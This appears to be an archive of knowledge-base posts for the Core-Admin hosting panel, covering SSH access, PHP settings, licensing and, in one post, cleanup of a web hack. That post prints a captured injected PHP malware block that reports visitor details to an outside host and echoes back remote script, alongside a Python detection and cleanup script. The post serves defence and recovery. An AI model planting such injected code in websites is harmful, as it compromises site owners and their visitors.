
Archive for Core-Admin Web Edition

How to activate ssh access for a hosting with Core-Admin


Introduction to activate ssh access for a hosting with Core-Admin

By default, every hosting created with Core-Admin has its own individual user, so that each hosting runs with isolated permissions.
This hosting user cannot log in through SSH, even if the SSH port is open and a password is configured.

This article explains how to enable or disable SSH access for a given hosting using Core-Admin.

Prerequisites

Be sure you have a firewall controlling the SSH port (usually 22/tcp) so that it is not left open to everyone. Access to it should be limited.
If you don’t have a firewall installed, use #Firewall manager. See the following manual to know how to configure it.

How to activate ssh access to a hosting for Core-Admin

Use the following steps. You will need Administrator rights to complete them.
First, open the #WebHostingManagement application.

Then, open the available option to manage SSH access.

After that, select the hosting to configure and whether you want to enable or disable SSH access.

Once the process is completed, the system will present you with a set of configuration notes ready to use.

How to disable SSH access for particular hosting with Core-Admin

If you want to disable SSH access, follow the same steps as described before, but select “disable” under “Ssh access”.

How to list hostings with SSH access with Core-Admin

Use the option available at the top level of the tree.

Posted in: #WebhostingManagement, Administration, Core-Admin, Core-Admin Web Edition, SSH, Web hosting


KB 22092016-001 : Fixing error message: The requested URL /cgi-bin/php-fastcgi-wrapper/index.php was not found on this server.

Symptom

If you get the following error, or something similar, when accessing a website created by the Core-Admin panel:

The requested URL /cgi-bin/php-fastcgi-wrapper/index.php was not found on this server.

Then it is possible that you created a website with a custom option that imported the php-engine setting from another site, or that the site.com/bin directory was lost.

Affected releases

All releases may suffer this problem. It’s not a bug but a wrong custom configuration.

Background

The problem arises because, somehow, core-admin was not able to create all the PHP structures needed to run this site with a different PHP engine.

Solution

To solve this, follow these general steps:

  1. Disable the custom configuration and let core-admin control the site.conf apache2 configuration. To do so, go to the WebHosting management tool, click on custom site configs, find the affected site, copy your custom settings into a temporary document (to restore them later) and disable the custom configuration.
  2. After that, select the PHP engine you want under the “PHP engines” section.
  3. Then, enable the custom site configuration again (if needed) and restore your custom settings.

Posted in: Apache2, Core-Admin Web Edition, PHP


Managing max POST size for a given web site — php post_max_size — php upload_max_filesize

Configuring max POST size  (post_max_size and upload_max_filesize)

Starting from revision 5110, Core-Admin supports easily configuring the maximum POST size that can be sent to a given web site, also known as the PHP settings “post_max_size” and “upload_max_filesize”.

To do so, log into your Core-Admin panel as admin user, select the web site you want to update, and then click on “Site options”.

[Screenshot: Core-Admin Webhosting management site option view]

If the option is not configured, it will be shown as “not configured”. To set it, click on it, enter the required value (in megabytes, MB) and then click on “Edit option”. With that you are done.

Posted in: Apache2, Core-Admin, Core-Admin Web Edition, PHP


PHP 7.0 support for Core-Admin Web Edition

Starting from release 1.0.46 (revision 4644), Core-Admin supports PHP 7.0 engines for your webhosting applications, configurable at domain level (so the rest of your hosting domains can run with different PHP engines). This new engine supports the latest PHP release alongside previous releases, including deprecated ones for legacy applications (5.6, 5.4, 5.3, 5.2).

Check out our Core-Admin Web Edition to see how it works: http://www.core-admin.com/portal/get-it/web-edition

Posted in: Core-Admin Web Edition, PHP, Web hosting


Configuring default web site to show when accessing with unknown addresses

If you want to show a default web page with a customized “unknown webpage” message when your server is accessed with an address that is not supported, or that is supported but at a different address (like accessing with https:// a web page that is only supported on http://), follow these steps:

1. First, go to Webhosting management and click on “Options”, then click on “Configure server”.

2. After that, click on “Configure default site”, set up the content and save it.

Posted in: Core-Admin, Core-Admin Web Edition, Web hosting


Using Core-Admin to resolve php+# web hacking

After a review you find that several web pages have been modified to include code like the following, or a customer whose web site is being blocked by the web browser calls you because it includes suspicious code like:

<?php
#41f893#
error_reporting(0); ini_set('display_errors',0); $wp_wefl08872 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_wefl08872) && !preg_match ('/bot/i', $wp_wefl08872))){
$wp_wefl0908872="http://"."http"."href".".com/href"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_wefl08872);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_wefl0908872);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_08872wefl = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_08872wefl,1,3) === 'scr' ){ echo $wp_08872wefl; }
#/41f893#
?>

These attacks do not harm the server if it is properly configured, but they make affected web pages execute remote chatting code or ads, which causes Google Chrome and many other browsers to block those pages for running that suspicious code.

Understanding these attacks

The problem with these attacks is that they update the original files with “surgical” modifications, making it difficult and annoying to get back to the original state.

One option is to have a backup, but newer web sites, which use different sorts of caches and php-to-string files, make recovery hard. It is not possible to recover just by replacing those files. You must get back to a consistent state (for example the last backup). This implies removing the current web files and recovering from the backup files (so backup files don’t get mixed with current files that weren’t included in the backup).

After this, you must remember to reset/block all FTP accounts/passwords that were used during the attack.

First line of defense: know when the attack happens

Core-Admin provides you with this knowledge as the attack happens. After the modification, Core-Admin’s file system watching service will report “possible php hash attack found” with an indication like the following:

[Screenshot: Core-Admin: detecting php hash attack]

After receiving this notification, you only have to run the following command to find out how many files were modified and how many FTP accounts were compromised. The same command will help you throughout the process of recovering infected files and updating the FTP accounts’ passwords.

>> crad-find-and-fix-phphash-attack.pyc

After running the above command, which only reports, you can execute the same command with the following options to fix the files found and to update FTP accounts:

>> crad-find-and-fix-phphash-attack.pyc --clean --change-ftp-accounts
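
The paired markers visible in the sample above (#41f893# ... #/41f893#) are what make the injected block findable. The following Python code is an added example, not Core-Admin's code and not a description of how crad-find-and-fix-phphash-attack works internally; it assumes the tag is six hex digits repeated in the closing marker, and the function names and sample text are constructed here.

```python
import re
from pathlib import Path

# Paired markers as in the sample above: "#41f893#" ... "#/41f893#".
# Assumption: the tag is 6 hex digits and the closing marker repeats it.
MARKER_BLOCK = re.compile(
    r"#(?P<tag>[0-9a-f]{6})#.*?#/(?P=tag)#[ \t]*\r?\n?",
    re.DOTALL | re.IGNORECASE,
)
# A PHP block left empty once the injected code has been removed.
EMPTY_PHP = re.compile(r"<\?php\s*\?>[ \t]*\r?\n?", re.IGNORECASE)


def find_injections(text):
    """Return (tag, line_number) for every paired marker block in text."""
    return [(m.group("tag").lower(), text.count("\n", 0, m.start()) + 1)
            for m in MARKER_BLOCK.finditer(text)]


def strip_injections(text):
    """Return text with marker blocks (and emptied PHP tags) removed."""
    return EMPTY_PHP.sub("", MARKER_BLOCK.sub("", text))


def scan_tree(root, suffixes=(".php", ".html", ".htm", ".js")):
    """Report-only walk: map each affected file path to its findings."""
    report = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in suffixes:
            hits = find_injections(path.read_text(errors="replace"))
            if hits:
                report[str(path)] = hits
    return report


# Constructed sample: a page with an injected block prepended (payload elided).
SAMPLE = (
    "<?php\n#41f893#\nerror_reporting(0); /* injected payload */\n#/41f893#\n?>\n"
    "<?php\n# site settings #\ninclude 'header.php';\n?>\n<h1>Welcome</h1>\n"
)

if __name__ == "__main__":
    print(find_injections(SAMPLE))   # report first
    print(strip_injections(SAMPLE))  # then review the cleaned text
```

A legitimate comment that happens to use the same marker shape would be removed too, so review the report from scan_tree before stripping anything.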

How did this attack happen?

This attack is connected with a network of servers that are in charge of applying these modifications, along with virus/malware software that infects machines that use known FTP clients. Here is how the attack develops:

  1. By using known FTP clients that save passwords at known places in the file system, the first part of the attack is established.
  2. It is suspected that using public Wifis and insecure networks while creating FTP sessions may be part of the problem too.
  3. After this, your machines get exposed to the virus/malware software that extracts stored FTP accounts and sends them to the servers that will perform the FTP attack.
  4. With this information, the modification servers (that’s what we call them) finally attack using those FTP accounts: they download the original files, update them and then upload them back to their original place.

Important notes about the attack

It is important to understand that modification servers do not carry out the attack just after receiving compromised FTP passwords. They wait until they have several passwords for the same system, and they also delay the attack to disconnect both incidents (the web hack and the infection of your computers).

This way, they hope unaware users will not connect both incidents, which would otherwise trigger an anti-virus scan by the user to stop the information leak.

On the other hand, they also wait to have several accounts to carry out a massive attack, looking for confusion and/or magnitude to increase the likelihood that part of the infection will survive.

How can I prevent it?

There are several actions you can take to avoid these attacks:

  1. Try not to save FTP accounts in your FTP client. Save them instead in an application that stores those passwords protected by a password.
  2. Avoid using public Wifis and untrusted shared connections (like hotels) to connect to your FTP servers.
  3. If possible, after doing FTP modifications, enable read-only mode or disable the FTP account using the Core-Admin panel. This way, even if the password is compromised, no modification will be possible.

Posted in: Core-Admin, Core-Admin Web Edition, PHP, Security


Core-Admin Web Edition: what is included in the license?

A single Core-Admin Web Edition subscription license includes the following general items which are at the same time the elements that are allowed:

  • Support for running a central server and the web interface (turbulence and core-admin central server)
  • Support to accept one agent connecting to this server. More agents can be added by acquiring more Core-Admin Single Agent or similar subscription licenses (see options).
  • Support to create any kind of core-admin users and delegating permissions to them.  This is crucial for any situation where users must have low level permissions to administrate only those objects that they need.
  • Support to run any number of the Core-Admin base applications on any connected server.
  • Support to run one instance of Webhosting management, Mail Admin, Dns Admin and Shared FTP manager.
  • Support to get updates (security, critical and upgrades) at any time, without any limit.
  • Support to create any number of objects without any limit (mail plans, webhosting, etc.).

There are other elements that are allowed by this subscription license but these are the most relevant. Contact us if you have any additional questions.

Posted in: Core-Admin Web Edition, Licensing


Core-Admin Free Web Edition: what is allowed commercially with this license?

You can use the Core-Admin Free Web Edition subscription license for any commercial or private use, even for selling hosting services using Core-Admin. The only difference is that it limits the number of objects (web hostings, mail plans) and it also places some restrictions on the kind of core-admin users you can create (to name some).

To see more details about differences between Core-Admin Web Edition and its Free Edition, see the following page: http://www.core-admin.com/portal/get-it/web-edition

In the case you have a private or corporate server and you want to manage your organization’s web pages with Core-Admin, and without considering the purpose of those web pages, then you can use Core-Admin Free Web Edition.

Posted in: Core-Admin Web Edition, Licensing


Core-Admin Web Edition: what license subscription do I need for several servers?

It depends on the kind of setup you want to install. First you have to cover the base installation to have a Core-Admin central server where to join agents. Let’s see this first:

  • Independent servers: if you want to separate those servers so that they have independent administration panels, you need one Core-Admin Web Edition subscription license for each server.
  • One panel, various servers: in the case you want to have a single panel controlling these servers, you need a single Core-Admin Web Edition subscription and one Core-Admin Single Agent subscription for each server you want to connect.

Now, you have to consider applications you want to run on those servers that are joined to the Core-Admin server:

  • In the case you want to have separate services in each server, for example, one server runs web services, other mail services and other dns services, you don’t need anything else because Core-Admin Web Edition includes support to run a single instance of all of those applications.
  • In the case you want additional applications you need to acquire a Core-Admin Standard Application subscription and indicate during the purchase process which application you need.
  • In the case you want all servers connected to a single central server but you still need to run all applications (dns, mail, web…) in all of them, it is cheaper to acquire one Core-Admin Web Edition subscription license for each of those servers instead of acquiring separate applications.

Posted in: Core-Admin Web Edition, Licensing
